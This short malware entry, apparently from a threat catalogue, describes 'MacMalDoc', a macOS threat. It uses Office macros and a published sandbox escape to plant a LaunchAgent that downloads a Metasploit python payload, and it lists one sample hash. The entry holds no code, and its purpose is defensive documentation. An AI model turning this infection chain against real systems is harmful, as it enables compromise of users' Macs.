MacMalDoc
MalDoc is the first malware threat for MacOS that exploits MS Office for Mac to infect the system.The malware uses a POC code published by Adam Chester that escapes MS Office sandbox to write a malicious file on the system.When opened, if macros are enabled on MS Office, a malicious script will be executed to escape the Office sandbox, to create a file on the system. In this case, the create file is a LaunchAgent, that will execute a python script to download the final payload:
Source: Objective-See
Source: Objective-See
The final payload is “Metapreter”, a python script that is generated by Metasploit and will open the door to a lot of malicious commands.
Links:
Samples:
70778374164075298aba2194c0c7bb1d08bde7f4